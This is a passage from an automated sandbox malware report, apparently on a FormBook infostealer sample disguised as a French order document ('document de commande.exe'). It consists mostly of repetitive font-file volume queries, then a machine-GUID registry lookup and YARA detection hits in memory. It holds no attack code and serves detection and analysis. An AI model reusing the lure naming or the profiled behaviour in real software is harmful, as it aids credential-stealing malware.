Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\document de commande.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 3.2.document de commande.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.document de commande.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.931899511.0000000004C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.752772430.00000000015B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.931429948.0000000000320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.732469683.000000000DA3A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
